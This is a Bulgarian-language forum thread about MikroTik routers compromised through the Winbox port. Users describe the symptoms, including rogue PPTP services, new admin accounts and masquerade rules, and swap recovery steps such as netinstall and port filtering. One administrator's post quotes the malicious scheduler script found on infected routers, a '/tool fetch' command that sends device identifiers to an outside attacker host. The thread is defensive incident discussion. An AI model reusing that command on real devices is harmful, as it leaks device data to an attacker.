Jump to content
  • 0

Хакнат микротик


px1
 Share

Question

Здравейте, Хакнаха ми един mikrotik L4 на X86 платформа.

Беше ограничен за достъп само от 5 IP адреса и със спрени всички сървиси осен API и WINBOX

Има ли начин да се преинсталира флашката за да се запази лиценза ?

 

Link to comment
Share on other sites

Recommended Posts

  • 0
  • Administrator

С нетинстал би трябвало да се запази ключа
ако не е най наложителната машина пиши на support@mikrotik.com 
дано намерят какво по дяволите правят гадовете

 

п.с

И на последната го лекуват гадовете вече влизам само през ROMON
в Scheduler се появява някаква задача "а" която изпълнява скрипт с име "ip"
със следното съдържание:
 

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bcжжжжжжжжжbf27&action=upload&sncode=A5C1F569жжжжжжжжжA8ED4743AEC042B&dynamic=static")  keep-result=no}

админ акаунт и да няма се създава

включват се всички сървиси и им се махат ограниченията

https://forum.mikrotik.com/viewtopic.php?t=135762

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Версията беше 6.42.5

Първоначално забелязах че че се появява PPTP сървис с име test и се появяваше маскарад на целя трафик и нов pool на DHCP и нови часни адреси.

Акаунта и паролите не бяха променени.

Веднага смених всички пароли и спрях сървисите освен API (заради Билинга) и WINBOX само от 5 IP адреса.

От петък сутринта вече нямам  достъп с акаунта си , но интернета на два от рутърите си върви , а на трети е спрял.

Третия е с бридж на два от портовете защото го ползвам и за суич.

Предполагам че хака се прави по някаква странна схема която чупи моята конфигурация на този рутър.

Утре ще купя нов CCR  и GR3 за да може после  netinstall да изтрия старите рутъри.

Предполагам чупят линукса и си оставят врата .

Edited by px1
Link to comment
Share on other sites

  • 0
Преди 3 часа, master написа:

Как става достъпа при положение, че е ограничен само от 5 адреса?

Мисля проблема е в ползването на non-ssl API , а и по-добре след такъв пробив да се ползва последен бекъп, като му се сменят всички пароли и  се затвърди стената, чрез смяна на портове, динамични блек листи за брутфорс и сканери, уайт листи за достъп и т.н. преди да се подвърже към публичното пространство!

Link to comment
Share on other sites

  • 0

От години не се беше случвало да видя в лога IP адреси който са се опитвали да се конектнат. На един от микротиците за 24 часа са се опитвали тези :

195.43.95.9о
185.2о9.0.12
5.188.4о.99
5.188.4о.100
138.68.51.1о7
77.72.83.11едно

 

Analog Audio™

Link to comment
Share on other sites

  • 0

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

  • 0
  • Administrator
Преди 10 часа, kokaracha написа:

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Edited by Fibernet
Link to comment
Share on other sites

  • 0
Преди 11 часа, 111111 написа:

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

 

Няма много начини за това. Или са имали данните и достъп или ограничението по адреси не работи или не е конфигнато правилно ( локанли мрежи ?).

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

  • 0
  • Administrator
Преди 9 часа, Fibernet написа:

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Точно през този порт става атаката.

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Явно Микротик го закъсаха относно сигурност. По неофициална информация знам че изпращането на файлове с вградения модул за изпращане на мейли също е бил компроментиран. Явно е въпрос на време да изпищят още хора. 

Link to comment
Share on other sites

  • 0

Здравейте,

преинсталирах си флашката без да губя лиценза използвайки описанието на MIKOROTIK

https://forum.mikrotik.com/viewtopic.php?t=86528

По въпроса с пробива прилагам преинсталация с netinstall , смяна на портовете и паролите и филтрация на портовете още във входящия рутър.

Ще изчакам няколко дни да видя има ли ефект.

 

Link to comment
Share on other sites

  • 0

Изглеждат глупаво  тези мерки щом  има проблем със сигурноста на самата система. По добре някакъв тунел с адмиснистративна */29 мрежа примерно би било доста по сигурно.

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Similar Content

    • bgoptic
      By bgoptic
      Нови
      https://www.senetic.bg/product/RBWAPG-60AD-SA 4бр. 170лв./бр.
       
      https://www.senetic.bg/product/RBWAPG-60AD-A 1бр. 110лв.
       
      https://www.senetic.bg/product/RBWAPG-60ADKIT 1бр(линк) 150лв
      Използван
      Rocket M5   1бр.  70лв.
    • bgoptic
      By bgoptic
      Нови
      SXTsq 5ac                                   16бр.                         60лв./бр.
      SXT SA5 ac                                   3бр.                         110лв./бр.
      Disc Lite5 ac                                 3бр.                         60лв./бр.
      OmniTIK 5 PoE ac                                                         120лв.
      OmniTIK 5 ac                                                                 110лв.    
      Използвани
      SXT Lite5 ac                                                                 50лв.
      SXT Lite5                                      3бр.                        40лв./бр.
      SXT 5 AC                                      3бр.                        60лв./бр.
       
      За повече инфо телефон: +420 77 три 016 шест 17(viber) или на Л.С.
    • JoroNikolaev
      By JoroNikolaev
      Привет, 
      Някой може ли да ми даде съвет с каква апратура да направя бридж (дистанция по карта 12км), търся нещо около 50-100mbps (за лично ползване е). Повече търся стабилност на линка. Първоначално се насочих към LHG 5, но прочетох, че се влиае от шум. Притеснявам се, че сигнала ще го пращам от връх на планина на който има 3 кули с антени на оператори и интернет доставчици. 
      Бюджета е около 250-300лв
      Поздрави, 
    • dobatavision
      By dobatavision
      Здравейте,
       
      Имам 2 доставчика на нет които използвам едновременно.
      Пуснах 2 правила в Netwatch едното следи 8.8.4.4 за единия доставчик, другото правило следи 8.8.8.8 за 2рия доставчик.
      Ако спре да пингва спира съответния /ip routes ако дойде пинг го активира пак.
      Дайте идея как да деактивирам другото правило в netwatch ако едно премине в статус Down.
      Така ще остане поне единия доставчик да работи, защото ако спрат и 2та dns-a ще ми се деактивират и 2та доставчика...
    • bgoptic
      By bgoptic
      Използвани
      RBLHGG-60ad kit                                                    2 комплекта                       210лв./комплекта
      Нови
      RBLHGG-60ad kit                                                    2 комплекта                       350лв./комплекта
      MIKROTIK RBwAPG-60ad kit                                1 комплект                         220лв./комплекта
      SXT SA5AC                                                              6бр.                                       130лв./бр.

      PowerBeam 2AC-400                                            1бр.                                       160лв./бр.
       
      За повече инфо телефон: +420 77 три 016 шест 17(viber) или на Л.С.
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.